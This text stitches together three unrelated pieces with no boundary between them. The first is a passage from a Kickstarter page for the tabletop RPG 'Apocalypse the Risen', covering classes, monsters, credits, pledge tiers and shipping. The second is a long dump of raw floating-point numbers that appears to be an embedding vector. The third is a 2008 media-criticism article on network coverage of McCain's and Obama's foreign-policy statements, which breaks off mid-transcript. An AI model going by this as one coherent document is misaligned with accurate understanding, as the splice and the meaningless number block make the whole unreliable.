locations, but they have a keen understanding of where resources can be discovered. Resources are vital to colony survival. Combustible, Consumable, and Mechanical resources are not just post-Risen currency, they are the lifeblood of maintaining and improving living conditions. This represents the food you eat and the materials that maintain and improve the quality of life for the colony. Nobody sniffs out resources like the Jackal. The Jackal selects from two career paths: Finders and Keepers. Finders are those that aspire to be an adventuring archaeologist. Keepers embrace the Supernatural, gaining powers of concealment either outright hide things or magically disguising places. Maverick – The ultimately lone wolf and consummate gunslinger, the Maverick is a wasteland icon relied upon for their quick reaction and incredible sharpshooting talent. The world outside a colony is a dangerous place, filled with fierce and cunning dead, damned, and worse. Few individuals can survive alone in such a dangerous world, and of that small lot you are likely to find a fair share of Mavericks. The Maverick is a separatist in spirit, though in practice they are some of the most valued members of a colony. Training themselves in mental focus a Maverick has honed their shooter reflexes to a razor’s edge and can anticipate the pitch of battle. Shepherd – Representing a colonies spiritual leadership, the Shepherd looks after their flock while dedicating themselves to eradicating demon kind. The Shepherd feels the call of faith to serve and preserve humanity. They focus their efforts in one of three paths, each providing different powers. While exemplifying some classic healer characteristics, the Shepherd gains spells and abilities outside that norm. This class commands powers of persuasion, influence, and inspiration in addition to their Otherworldly magic. Splicer – Splicers are tinkers, mechanics, engineers, scientists, and inventors, offering colonies and hunting parties innovative solutions and powerful magic. Preferring to avoid directly channeling the foul supernatural energy, they have learned to use technology to store the energy and fire those spells through their Caster. Spells require an attack roll, and “memorizing” these spells require creating a “fuse” that stores the spell and requires a combination of combustible and mechanical resources. The Caster takes up a single hand and must have some way of pointing and firing a spell. More details about the classes can be found in the free downloads near the top of this campaign. Since the breaking of the Seals, the poor souls passing into the afterlife are no longer able to cross into Purgatory. The alternatives are equally tragic and varied. The following is a recap of the known consequences of death. Risen – These creatures are the zombies of Apocalypse the Risen. Most mindlessly feed on the living while some rare Risen are sentient. As these creatures feed on the essence of the living they evolve into increasingly dangerous creatures. With numerous types of Risen and custom templates, customizing encounters is a snap. PCs and others that perish are most likely to come back as some form of Risen… unless one takes the necessary steps. Included Risen: Hungry, Famished, and Ravenous Risen to Unlock: Devourer, Depraved, and Horde Templates to Unlock: Starved, Bloated, Mutated, and Infested Ghosts – Souls and fragments of raw emotions trapped and twisted with no path to Purgatory seek to punish and kill the living. These souls were so tormented in life, or died so tragically, that at the time of death they formed a new being entirely. These creatures exist on both Earth and in Paradox simultaneously. Did we not mention Paradox? Included Ghosts: (Emotes) Rage, Loathing, Terror, Grief, and (True Ghost) Apparition Ghosts to Unlock: Shade, Shadow, and Poltergeist Demons – Demons are creations of the Darkness, fractured by the Light into their very sin nature and now taking a variety of forms on Earth. In addition to separation by sin nature, demons vary by many different criteria, powers, and physical appearances. Demons have a hierarchy among each other and the Seven leaders, topped by Pride. Each faction maintains a tenuous agreement mostly based on fear, scheming and vying for power. Demons fall into one of two types: Shunned and Embraced, all still within one of the seven sin natures. Included Shunned: Fire Urchin (Sloth), Shyft (Gluttony) Shunned to Unlock: Dredge (Lust), Corrode (Envy), Locustus (Greed), Angler (Wrath), and Eyrachnid (Pride) Embraced to Unlock: Jobber (Greed), Lunatic (Envy), and Purifier (Pride) Devils – These creatures were once angels with dominion over various aspects of Earth and humanity before giving in to the Darkness. Many of these creatures hid on Earth when the Seals were closed, avoiding being imprisoned in the Lower Realm. Devils are a perverse and altered variant of their once angelic form. Devils to Unlock: Eclipse These areas are infused with Supernatural energy through tragedy or sorrow, now twisted and dangerous. Darklands vary widely in size and appearance. While all Darklands cause mutations, each have vastly different features often based on the events causing their change. Darklands produce terrible mutated flora and fauna, creating very dangerous beasts. Perhaps worse, some colonies make their homes in Darklands, embracing the mutations and even worshiping the Darkness. The twisted Supernatural energy of Darklands do create some very interesting materials including: Dark Steel, Dark Bone, and Dark Glass. Darkland Beasts – Dangerous flora and fauna mutated by the corrupting Supernatural forces within Darklands. These once mundane creatures were already adapting to the new harsh reality of survival in post-apocalyptic Earth. Combined with horrifying mutations the once familiar animals are anything but familiar now. Darkland Beasts to Unlock: A variety of beasts and mutations added with Expanded Environmental Hazards. Rusted Portal Games Donaven Brines - Game Design Chad Matson - Lead Developer, Pathfinder Jason Stolberg - Lead Developer, Fifth Edition Reid Finucan - Game Developer Jeff Carter - Logistics Alison Hinch - Art Director Apocalypse the Risen Contributing Artists Raven Mimura - Iconics Rodrigo Vega - Races Preston Stone - Ghosts, Demons, and Devil Vincent Coviello - Risen Christopher Onciu - Demons Apocalypse the Risen Contributing Writers Amy DuBoff - North/South America Region Ant Tessitore - US Mid-Atlantic/Southest Region Jacob Huebsch - US Mid-West Region Robert Hazelton - US Northeast Region James Pianka - US West Region Craig Guarisco - US Northwest Region Jenna Pitman - US Southwest Region RISEN You didn't make it but we greatly appreciate your sacrifice! Track the campaign and receive access to backer-exclusive updates. SURVIVOR Congrats, you made it this far. Thank you for your support and good luck out there. AtR Wallpaper Pack: Receive a range of emotions in a four pack of digital wallpaper. MARAUDER Successful raid on the Rusted Portal colony! You’ve acquired something valuable without losing anyone in the effort. Well done. (Choose Either PF or 5E) AtR Campaign Setting (PDF): Receive the heavily linked complete PDF of the Apocalypse the Risen Campaign Setting for either Fifth Edition and Pathfinder Compatible. Receive the heavily linked complete PDF of the Apocalypse the Risen Campaign Setting for either Fifth Edition and Pathfinder Compatible. “Campaign” Stretch Goals: Your selected copy of the game (5E or PF) (PDF and/or Print) will include all “Campaign” Stretch Goals unlocked throughout the course of this campaign. These stretch goals add a sizable amount of content into the final book. Your selected copy of the game (5E or PF) (PDF and/or Print) will include all “Campaign” Stretch Goals unlocked throughout the course of this campaign. These stretch goals add a sizable amount of content into the final book. All Rewards from SURVIVOR REPORTER You are accustomed to traveling light on your route between colonies. You trade in knowledge, rumor, and good will. “Adventure” Stretch Goals: Receive all unlocked content from the Social Media “Truth Transmissions” and all unlocked “Adventure” Stretch Goals for entries into the Journal of Dr. Dobrin. Receive all unlocked content from the Social Media “Truth Transmissions” and all unlocked “Adventure” Stretch Goals for entries into the Journal of Dr. Dobrin. “War Chest” Stretch Goals: Receive all “War Chest” Stretch Goals in PDF unlocked throughout the course of this campaign for the selected system (PF or 5E). Receive all “War Chest” Stretch Goals in PDF unlocked throughout the course of this campaign for the selected system (PF or 5E). All Rewards from MARAUDER (All PDF Material for either Pathfinder or Fifth Edition) COLONIST Finally, a place you can call home in this world gone mad. You have shelter, friends, people that look after you and rely on you. Colonies are the first step from surviving toward thriving. (Choose Either PF or 5E) AtR Campaign Setting (PRINT): Receive the full color hardback print of the Apocalypse the Risen campaign setting. Fifth Edition and Pathfinder Compatible. Receive the full color hardback print of the Apocalypse the Risen campaign setting. Fifth Edition and Pathfinder Compatible. “Adventure” Stretch Goals: Receive all unlocked content from the Social Media “Truth Transmissions” and all unlocked “Adventure” Stretch Goals for adventure entries into the Journal of Dr. Dobrin. Receive all unlocked content from the Social Media “Truth Transmissions” and all unlocked “Adventure” Stretch Goals for adventure entries into the Journal of Dr. Dobrin. All Rewards & Stretch Goals from MARAUDER SCAVENGER You have made your way in this world by finding valuable assets in unlikely places. Overlooked resource hiding placings are no match for your skilled eye. (BOTH PF & 5E) AtR Campaign Setting (PDF): Receive the heavily linked complete PDF of the Apocalypse the Risen Campaign Setting including “Easter Egg” watermark for both Fifth Edition and Pathfinder Compatible. Receive the heavily linked complete PDF of the Apocalypse the Risen Campaign Setting including “Easter Egg” watermark for both Fifth Edition and Pathfinder Compatible. Rewards as per REPORTER but with all PDF content for BOTH Pathfinder and Fifth Edition GOODSMAN Trade is vital to the health of a colony and you have found a niche delivering the goods. Life on the road is always an adventure, but the colonies you trade with are happy to see you... usually. (Choose Either PF or 5E) Character Pad (25ct each) (PRINT): Receive a pad each of Apocalypse the Risen 5E and PF character sheets. Two-sided print job on high quality paper with a tear away glued top on a cardboard backer. Great for campaign build sessions! Receive a pad each of Apocalypse the Risen 5E and PF character sheets. Two-sided print job on high quality paper with a tear away glued top on a cardboard backer. Great for campaign build sessions! “War Chest” Stretch Goals: Receive all “War Chest” Stretch Goals unlocked throughout the course of this campaign. Receive all “War Chest” Stretch Goals unlocked throughout the course of this campaign. All Rewards & Stretch Goals from COLONIST HUNTER You put your safety on the line every day. If a hero exists on post-Rise Earth, the colony hunters would receive that honor. You are a warrior, through blades, guns or magic, scavenging post-Rise Earth and battling hordes of Risen and the Darkness for the betterment of your colony. (Choose Either PF or 5E) AtR Campaign Setting (Leather): Kickstarter Exclusive! Receive the full color Apocalypse the Risen campaign setting bound in leather (undoubtedly demon hide). Fifth Edition and Pathfinder Compatible. Kickstarter Exclusive! Receive the full color Apocalypse the Risen campaign setting bound in leather (undoubtedly demon hide). Fifth Edition and Pathfinder Compatible. All Rewards & Stretch Goals from GOODSMAN LEGEND Word of your exploits extends throughout the region. Marauders avoid your colony for fear of retribution. (BOTH PF & 5E) AtR Campaign Setting (PDF): Receive the heavily linked complete PDF of the Apocalypse the Risen Campaign Setting including “Easter Egg” watermark for both Fifth Edition and Pathfinder Compatible. Receive the heavily linked complete PDF of the Apocalypse the Risen Campaign Setting including “Easter Egg” watermark for both Fifth Edition and Pathfinder Compatible. (BOTH PF & 5E) AtR Campaign Setting (PRINT): Receive the full color hardback print of the Apocalypse the Risen campaign setting. Fifth Edition and Pathfinder Compatible. Receive the full color hardback print of the Apocalypse the Risen campaign setting. Fifth Edition and Pathfinder Compatible. (BOTH PF & 5E) Character Pad (25ct each) (PRINT): Receive a pad each of Apocalypse the Risen 5E and PF character sheets. Two-sided print job on high quality paper with a tear away glued top on a cardboard backer. Receive a pad each of Apocalypse the Risen 5E and PF character sheets. Two-sided print job on high quality paper with a tear away glued top on a cardboard backer. “Handle” Inscription: Your handle (post-Rise name) will be added to the book as part of the Rusted Portal Colony. Your place of honor will go down in Apocalypse the Risen history! Your handle (post-Rise name) will be added to the book as part of the Rusted Portal Colony. Your place of honor will go down in Apocalypse the Risen history! GM Screen: Receive a full color GM screen including incredible Apocalypse the Risen art and valuable in-game tools. Receive a full color GM screen including incredible Apocalypse the Risen art and valuable in-game tools. All Other Rewards & Stretch Goals from GOODSMAN ANTIQUITY You are a world traveler, running channels from one corner of post-Rise Earth to another uncovering ancient relics to battle the Darkness. Demons know you by name and actively hunt you. (BOTH PF & 5E) AtR Campaign Setting (Leather): Kickstarter Exclusive! Receive the full color Apocalypse the Risen campaign setting bound in leather (undoubtedly demon hide). Fifth Edition and Pathfinder Compatible. Kickstarter Exclusive! Receive the full color Apocalypse the Risen campaign setting bound in leather (undoubtedly demon hide). Fifth Edition and Pathfinder Compatible. Iconics Character Builds (PDF): Receive the character sheets for all nine class iconics for both systems (5E and Pathfinder Compatible). Iconics average 14th level and include unique gear, magic items, and story hooks. Receive the character sheets for all nine class iconics for both systems (5E and Pathfinder Compatible). Iconics average 14th level and include unique gear, magic items, and story hooks. All Other Rewards & Stretch Goals from LEGEND. Printed books are leather bound. DEMONOLOGIST You have met many agents of the Darkness and survived. Your knowledge of demons is unsurpassed, having developed strategies and tactics against even the most indoctrinated Embraced. You have documented a new demon and determined its name. Demon Designer! Work directly with the Rusted Portal team to design a unique demon for Apocalypse the Risen (Shunned or Embraced) in both 5E and Pathfinder. Your demon design will be professionally illustrated by artist Preston Stone. You will receive a PDF of the completed design with stat block and your demon will be added to a future publication where you will receive game designer credit. Work directly with the Rusted Portal team to design a unique demon for Apocalypse the Risen (Shunned or Embraced) in both 5E and Pathfinder. Your demon design will be professionally illustrated by artist Preston Stone. You will receive a PDF of the completed design with stat block and your demon will be added to a future publication where you will receive game designer credit. All Rewards & Stretch Goals from ANTIQUITY DIRECTOR Your colony is a hub for trade and you its respected leader. Your knowledge spurs hunters to adventure around the globe. You are the sage explorers seek for artifacts of the Before and you even know the demon guarding them. Adventure Designer! Work directly with the Rusted Portal team to design a one-shot adventure of up to 9th level, created in both 5E and Pathfinder. Your design will include creating an important colony added to the Apocalypse the Risen canon where the adventure will originate. Your design will include creation of the NPC leader of the colony which we will have illustrated to fulfill your concept. The adventure will include creation of a unique magical relic and a newly discovered demon, both of which we will work with you to design. That demon will be illustrated by artist Preston Stone. You receive a PDF of the completed adventure layout with illustrations which will also be published where you will receive game designer credit. Work directly with the Rusted Portal team to design a one-shot adventure of up to 9th level, created in both 5E and Pathfinder. Your design will include creating an important colony added to the Apocalypse the Risen canon where the adventure will originate. Your design will include creation of the NPC leader of the colony which we will have illustrated to fulfill your concept. The adventure will include creation of a unique magical relic and a newly discovered demon, both of which we will work with you to design. That demon will be illustrated by artist Preston Stone. You receive a PDF of the completed adventure layout with illustrations which will also be published where you will receive game designer credit. All Rewards & Stretch Goals from ANTIQUITY ICONIC No other has come before you on post-Rise Earth. You wield new and strange powers in an already abnormal world. You are iconic! Class Designer! Work directly with the Rusted Portal team to design a tenth character class for Apocalypse the Risen in both 5E and Pathfinder. You will gain insider access to the larger Worlds of the Portal setting, including Paradox, Purgatory, and the Void. Your class design will be professionally illustrated and you receive PDFs of the completed design. The new class will be included in future publications where you will receive game designer credit. Work directly with the Rusted Portal team to design a tenth character class for Apocalypse the Risen in both 5E and Pathfinder. You will gain insider access to the larger Worlds of the Portal setting, including Paradox, Purgatory, and the Void. Your class design will be professionally illustrated and you receive PDFs of the completed design. The new class will be included in future publications where you will receive game designer credit. All Rewards & Stretch Goals from ANTIQUITY DOMESTIC SHIPPING Domestic shipping in the US will be added to your pledge. The price represents the estimated USPS shipping costs for the content included for that pledge. The versions with two books require more shipping than the single book levels. INTERNATIONAL SHIPPING International shipping is NOT included with your pledge. Shipping internationally is unfortunately very expensive and the rate fluctuations make it difficult to predict. Shipping outside the US varies depending on your country and which rewards you receive. You’ll pay the shipping costs at the time of fulfillment. We encourage International backers to visit the USPS website for an estimate on shipping costs. We cannot guarantee the final weight of our books, but estimate each will weigh about 2 pounds (0.9kg). However, this estimate is subject to stretch goal upgrades, spec changes, and the weight of packaging. Note that you are responsible for import duties, taxes, vat fees, etc. We comply with international law. Shipments will likely originate from near Kirkland, Washington.
[ -0.03132696822285652, -0.027405420318245888, -0.024507077410817146, 0.02408597618341446, 0.02665051817893982, -0.005181680433452129, -0.04735874757170677, -0.016799375414848328, 0.07073523104190826, 0.057371530681848526, -0.023697899654507637, -0.06300067901611328, -0.01124956738203764, -0.015650633722543716, 0.009283077903091908, 0.03147074952721596, -0.027556994929909706, -0.035470642149448395, -0.03272324055433273, -0.04645238071680069, -0.010740043595433235, 0.04828151315450668, -0.07505346834659576, 0.05870319902896881, -0.03227351978421211, -0.029422283172607422, 0.006227152422070503, 0.042617958039045334, -0.08815333247184753, -0.014878129586577415, 0.04326768219470978, -0.04994001239538193, 0.018727757036685944, -0.0038109056185930967, -0.052717387676239014, 0.13334135711193085, 0.03120267204940319, -0.07046935707330704, -0.06835416704416275, -0.011059611104428768, -0.030413351953029633, -0.032158300280570984, 0.005888471379876137, 0.02563105896115303, -0.03324061632156372, -0.04328658804297447, -0.08474528789520264, -0.005164994392544031, 0.010199292562901974, -0.09415113925933838, 0.06966022402048111, -0.066761814057827, 0.01717877946794033, -0.004068479407578707, -0.025467608124017715, -0.04585360735654831, -0.025262480601668358, -0.04885898903012276, 0.005509430542588234, -0.12546271085739136, 0.0003977567539550364, 0.013692177832126617, 0.0005929667968302965, 0.014272620901465416, 0.027728723362088203, -0.003661710536107421, 0.09668856859207153, 0.0136130815371871, -0.017105014994740486, 0.006923674140125513, -0.055070336908102036, -0.002489671343937516, 0.06658325344324112, -0.05559530481696129, -0.0432911217212677, -0.01823781058192253, 0.02942313812673092, -0.03794533759355545, -0.014302350580692291, 0.029131274670362473, 0.13142596185207367, 0.09904562681913376, 0.018849128857254982, -0.011265967041254044, 0.026896696537733078, 0.01977694220840931, -0.03893308341503143, 0.06228334829211235, 0.051244087517261505, 0.05050038546323776, -0.08390495926141739, -0.03182321414351463, 0.01768743433058262, 0.14319764077663422, 0.02385280653834343, -0.017543761059641838, 0.022757701575756073, -0.03440031036734581, -0.011468427255749702, 0.04589027166366577, -0.035521574318408966, -0.023623807355761528, -0.044932425022125244, -0.029711207374930382, -0.012672319076955318, -0.05039611831307411, -0.07208290696144104, 0.015735633671283722, -0.06543352454900742, 0.003571984823793173, 0.014658164232969284, -0.09785382449626923, -0.04041163623332977, -0.014753840863704681, 0.09593437612056732, 0.11659090220928192, -0.00031277284142561257, -0.00309266010299325, -0.073847696185112, 0.08505478501319885, 0.08824937045574188, 0.03298460692167282, -0.002790294121950865, 0.047937311232089996, 0.03265559673309326, 0.010521459393203259, 0.041132837533950806, 3.2812628085998405e-33, -0.016246721148490906, -0.0064605530351400375, -0.04633551463484764, 0.08293351531028748, 0.005646286997944117, -0.027848944067955017, -0.04760286584496498, 0.05830931290984154, -0.07599619776010513, -0.005667693447321653, -0.009410263039171696, 0.09425471723079681, 0.04620008170604706, 0.07695485651493073, -0.03991216793656349, -0.03491855412721634, 0.03051241859793663, 0.02301960624754429, -0.0030653898138552904, -0.08623004704713821, -0.059139739722013474, -0.01796862855553627, -0.006522978190332651, -0.02408970519900322, 0.030899444594979286, -0.016653532162308693, -0.04770367592573166, 0.07070037722587585, -0.022167840972542763, 0.008381782099604607, -0.03277301788330078, 0.01193248014897108, 0.019739657640457153, 0.03777625784277916, -0.00039531991933472455, 0.06641774624586105, -0.02768995240330696, -0.0006800395785830915, -0.023892676457762718, 0.03251657262444496, -0.05819351598620415, 0.09357079863548279, -0.09152006357908249, -0.030330920591950417, 0.028312118723988533, -0.009737242944538593, 0.02076176553964615, -0.06070682778954506, -0.13967257738113403, 0.06519246101379395, -0.02619686722755432, -0.003666008822619915, 0.003475541016086936, -0.014117888174951077, -0.03701433166861534, -0.04267970845103264, -0.024780895560979843, -0.04849904775619507, -0.026437804102897644, -0.03752603009343147, 0.06570366024971008, 0.0024127457290887833, -0.0062135132029652596, 0.010649893432855606, 0.0014887118013575673, -0.0805264338850975, 0.05888916924595833, -0.0037286137230694294, -0.00722471484914422, 0.029633017256855965, 0.025046125054359436, -0.005572870839387178, 0.027904199436306953, 0.03638661652803421, 0.05766511708498001, 0.005294683389365673, 0.05575385317206383, 0.02797071263194084, 0.0024200123734772205, 0.027740297839045525, -0.008470040746033192, -0.07376839965581894, -0.05176010727882385, 0.01737343706190586, 0.054784175008535385, -0.0048861573450267315, 0.02710687555372715, -0.07184663414955139, -0.06464707106351852, -0.02592463046312332, -0.025730041787028313, -0.006201533600687981, 0.1339796930551529, -0.02005651779472828, 0.013822667300701141, -4.2535130841390006e-33, 0.06656620651483536, -0.039470214396715164, -0.07318388670682907, -0.03298269957304001, -0.002369909081608057, -0.02434791810810566, -0.061123818159103394, 0.0010809054365381598, -0.036893006414175034, -0.011923026293516159, -0.03815116360783577, 0.0720817968249321, 0.018393369391560555, 0.0676674023270607, 0.04429761692881584, -0.14125841856002808, 0.03138231486082077, 0.044814661145210266, -0.008911105804145336, 0.014029115438461304, 0.022616062313318253, 0.052456337958574295, -0.14160242676734924, -0.14633126556873322, 0.04157621040940285, 0.06237701699137688, 0.04175470769405365, 0.016655802726745605, -0.006426510401070118, -0.018669862300157547, -0.007152492646127939, 0.022798296064138412, 0.0002640879829414189, -0.041221681982278824, -0.05762064456939697, 0.15205718576908112, 0.057225000113248825, -0.05925225839018822, -0.010986408218741417, -0.06409915536642075, 0.02725663222372532, 0.08305628597736359, 0.03487684950232506, -0.010207952931523323, -0.10975072532892227, 0.08615239709615707, 0.09325031191110611, 0.12452129274606705, 0.06908505409955978, -0.006102634593844414, -0.01715121790766716, -0.013975490815937519, 0.004082909319549799, 0.017785165458917618, -0.04816960543394089, -0.017057379707694054, 0.010661843232810497, -0.06802528351545334, -0.06106838956475258, 0.022976413369178772, -0.024914352223277092, 0.03152037411928177, -0.017659487202763557, 0.035038165748119354, 0.008450541645288467, -0.08837345987558365, -0.019407130777835846, 0.05771942064166069, -0.01764066144824028, 0.009556739591062069, -0.04130883887410164, 0.008834423497319221, -0.10794772207736969, -0.02825281396508217, 0.018030190840363503, -0.07585541158914566, -0.031912706792354584, -0.0018063538009300828, 0.004667993634939194, -0.013095413334667683, -0.030798958614468575, -0.044808875769376755, -0.02662794478237629, 0.11978291720151901, 0.012632973492145538, -0.010806865058839321, 0.026203123852610588, 0.06039055809378624, -0.011525577865540981, -0.036352772265672684, -0.01770627312362194, 0.009884628467261791, -0.07312934845685959, 0.028785541653633118, -0.020733781158924103, -6.918538275613173e-8, 0.01983417384326458, 0.004260350950062275, -0.024454988539218903, -0.053699661046266556, 0.05181822553277016, 0.05610886961221695, 0.11091586947441101, 0.022610552608966827, -0.007365914527326822, 0.05019909888505936, 0.005638505332171917, 0.08762344717979431, 0.10368826985359192, 0.016719844192266464, 0.02837149053812027, 0.04012765735387802, 0.023521728813648224, -0.028702886775135994, -0.07248887419700623, -0.04286056011915207, -0.013109950348734856, 0.02644302509725094, 0.022986652329564095, -0.1247507631778717, 0.06287034600973129, -0.009954643435776234, -0.03994855284690857, -0.011988025158643723, -0.03560742735862732, 0.0180214736610651, 0.023666057735681534, 0.07169970870018005, -0.020063480362296104, 0.05664344131946564, -0.02838028408586979, 0.059011269360780716, 0.005344411823898554, 0.05892151966691017, 0.0010603904956951737, -0.05277558043599129, 0.007237670477479696, 0.062028076499700546, 0.06636397540569305, 0.03914281353354454, -0.03200172632932663, -0.062318988144397736, 0.016937727108597755, -0.0009756872896105051, -0.003954578191041946, -0.08920835703611374, -0.027938267216086388, 0.02400803379714489, 0.0461902841925621, 0.07271844893693924, 0.08077731728553772, -0.030007408931851387, -0.020161814987659454, 0.09244468063116074, -0.014198042452335358, 0.06880773603916168, 0.14794103801250458, -0.1440904438495636, -0.0541401170194149, 0.00025231746258214116 ]
Despite media figures from the three broadcast networks asserting that because of the extensive media presence on his trip to the Middle East and Europe, any "mistake," "gaffe," or "misstatement" by Sen. Barack Obama would be amplified and could have vast negative consequences, none of the networks' evening news programs has reported on Sen. John McCain's recent misstatements regarding a nonexistent Iraq-Pakistan border and the timing of the Anbar Awakening. None of the three broadcast networks' evening news programs -- ABC's World News with Charles Gibson, the CBS Evening News with Katie Couric, and NBC's Nightly News with Brian Williams -- has reported on Sen. John McCain's recent misstatements regarding a nonexistent Iraq-Pakistan border and the timing of the Anbar Awakening. In contrast with the networks' ignoring McCain's misstatements in their nightly news broadcasts, both of which have been made during Sen. Barack Obama's trip abroad, media figures from each network warned of what they said would be the great impact of any "mistake," "gaffe," or "misstatement" by Obama during his trip. For instance: In advance of Obama's trip, ABC News chief Washington correspondent George Stephanopoulos said during the July 18 edition of ABC News' Good Morning America that in his trip Obama has "got to show he can do the job. And above all ... not make any mistakes on this trip. A gaffe could be a killer for Obama." Stephanopoulos went on to say that the "McCain campaign is very frustrated by this" because "[a]ll three evening news anchors going over to -- on this foreign soil with Barack Obama." He added, "I think they will look to take quick hits every day and, of course, pounce on any mistake that Barack Obama makes. That would be the big opening for the McCain campaign." On the July 18 edition of the CBS Evening News, senior political correspondent Jeff Greenfield said that the "saturation coverage" of Obama's trip "has already led the conservative blogosphere to offer blistering critiques of a liberal media slavishly treating Obama as a pop star, but of course, Katie [Couric], the sheer presence of media in no way guarantees favorable coverage. In some ways, it makes the possibility of a misstep that much more dangerous." In response to anchor Katie Couric's question, "What do you think is the biggest potential landmine for him," Greenfield responded: "You know, I think it's everything from an untoward photo opportunity -- [former Democratic presidential candidate Michael] Dukakis in a tank -- to a misstatement that makes it seem to critics that he really does not know the nature of the terrain that he's -- that he's talking about." NBC News chief foreign affairs correspondent Andrea Mitchell said that Obama ran the "risk of making a mistake in a very high-profile trip," during the July 18 broadcast of MSNBC's Morning Joe. David Gregory, NBC News chief White House correspondent and host of MSNBC's Race to the White House, teased a discussion on the July 17 edition of his MSNBC show by stating: "Next up, Obama studying the script for his world stage debut next week. He's expected to stick closely to campaign talking points to avoid a potential gaffe that, as we say, could be heard around the world." Notwithstanding the importance they attached to any potential "gaffe" by Obama during his trip, the three networks have ignored two missatements by McCain in the same time period. None of the networks has reported during its evening news program that in an interview with Couric, McCain falsely claimed that the 2007 troop surge "began the Anbar Awakening." As Media Matters for America has documented, the Anbar Awakening reportedly began in September 2006, months before the surge was even announced. Indeed, as blogger Jed Lewison noted, in the March-April 2008 issue of Military Review, Col. Sean B. MacFarland -- who McCain said "was contacted by one of the major Sunni sheiks" -- and Maj. Niel Smith wrote: "The 'Anbar Awakening' of Sunni tribal leaders and their supporters that began in September 2006 near Ramadi seemed to come out of nowhere." President Bush announced the surge on January 10, 2007, asserting in an address that he had "committed more than 20,000 additional American troops to Iraq." In the case of CBS News, rather than airing McCain's falsehood in response to Couric's question on Obama's statements regarding "increased security in Iraq," CBS cut out the falsehood completely and instead aired comments by McCain that were spliced together from three separate statements he gave during the interview, one of which was in response to a different question. Couric gave no indication that these comments had been edited in any manner, nor did she otherwise note McCain's falsehood. In a statement reported in The Washington Post on July 24, CBS News acknowledged it erred, but maintained, falsely, that the video as aired did not misrepresent McCain's comments. In addition, while being interviewed on the July 21 broadcast of ABC's Good Morning America, McCain referred to "the Iraq-Pakistan border" -- which does not exist -- while discussing the ongoing war in Afghanistan. As Media Matters noted, host Diane Sawyer did not correct McCain's statement or otherwise point out that Iraq and Pakistan do not share a border. The ABC News political newsletter The Note stated of McCain's "Iraq-Pakistan border" comment: "[I]t was McCain who owns the first big gaffe of the trip," referring to Obama's trip to the Middle East and Europe. But none of the three networks -- including ABC -- reported on the misstatement during its evening broadcast. From July 18 edition of MSNBC's Morning Joe: MIKA BRZEZINSKI (co-host): Let's talk about Barack Obama's trip overall. MITCHELL: My pleasure. BRZEZINSKI: What are the risks that he faces politically along the way here? MITCHELL: Well, first of all, the risk of making a mistake in a very high-profile trip. Also, the risk of getting involved in Middle East diplomacy. From the July 18 edition of the CBS Evening News with Katie Couric: GREENFIELD: The second part of Obama's trip will be a campaign-funded visit to Europe and the Middle East. He'll meet with Israeli and Palestinian leaders, walking a fragile diplomatic tightrope. JOE TRIPPI (CBS News political analyst) [video clip]: This is a high-stakes game for Obama. He doesn't want to make any mistakes. Certainly if he does make one, make a statement that causes a problem, it'll be a huge one. GREENFIELD: But with voters concerned about the freshman senator's foreign policy and national security experience, Obama has little choice but to take the overseas gamble to shore up his credentials. For its part, the McCain camp was on the attack with a new ad. UNIDENTIFIED MALE [video clip]: He hasn't been to Iraq in years. now Obama is changing to help himself become president. GREENFIELD: There's little question that throughout this trip, Senator Obama will be walking a fine line. TRIPPI [video clip]: You want to look presidential, but you don't want to look like you're president. That could be presumptuous and it could backfire here in -- here with the electorate. GREENFIELD: This saturation coverage has already led the conservative blogosphere to offer blistering critiques of a liberal media slavishly treating Obama as a pop star, but of course, Katie, the sheer presence of media in no way guarantees favorable coverage. In some ways, it makes the possibility of a misstep that much more dangerous. COURIC: Of course, he does, as you mention, have to walk some tightropes. What do you think is the biggest potential landmine for him? GREENFIELD: You know, I think it's everything from a -- an untoward photo opportunity -- Dukakis in a tank -- to a misstatement that makes it seem to critics that he really does not know the nature of the terrain that he's -- that he's talking about. COURIC: And while the political benefits are -- are many, i.e., you know, visuals of him appearing statesmanlike with a variety of world leaders, can a single trip wipe out the perception in the minds of some that he lacks the credentials in foreign policy? GREENFIELD: Well, assuming he doesn't come back with a Mideast peace plan that all -- everybody signs on to, which is unlikely, no, but it can neutralize the fears. He doesn't have to equal McCain in that stature; he just has to make voters seem like he's OK, he knows what he's talking about. From the July 18 edition of ABC's Good Morning America: ROBIN ROBERTS (news anchor): Well, how is he going to kind of change the perception out there? Because our latest poll shows that most Americans, even most Democrats, say that Senator John McCain would be a good commander-in-chief of the military. Fewer than half of those polled feel that way about Obama. So, what does he need to do on this trip to change that? STEPHANOPOULOS: He's got to show he can do the job, and above all, Robin, not make any mistakes on this trip. A gaffe could be a killer for Barack Obama. In Iraq, he's got a special problem. As Martha hinted at just a couple of minutes ago, he is going to be talking to commanders who disagree with the timeline he's set out for Iraq. And he -- somehow, he's got to find a way to show that he's listening to the commanders but is not giving up on his principles. That's going to be difficulty number one. Number two, in Israel, he'll face this tricky thicket of -- of questions about the Middle East peace process. Many presidential candidates have made mistakes on -- on that before. He's going to have to avoid that. In Europe, it's slightly different. In Europe, he -- he's -- he's facing a situation where he does have an advantage on foreign policy, improving America's image in the world. And somehow, he's got to express the aspirations for the United States, the aspirations of an Obama policy without appearing to criticize President Bush overseas. ROBERTS: And finally, how does McCain counter all of this attention that Obama is going to be receiving on this trip? STEPHANOPOULOS: The McCain campaign is very frustrated by this, as you know. All three evening news anchors going over to -- on this foreign soil with Barack Obama. They know he's gonna get a lot of attention. I think they will look to take quick hits every day and, of course, pounce on any mistake that Barack Obama makes. That would be the big opening for the McCain campaign. ROBERTS: All right, George, thank you as always for "The Bottom Line," and have a good weekend. From the July 17 edition of MSNBC's Race for the White House:
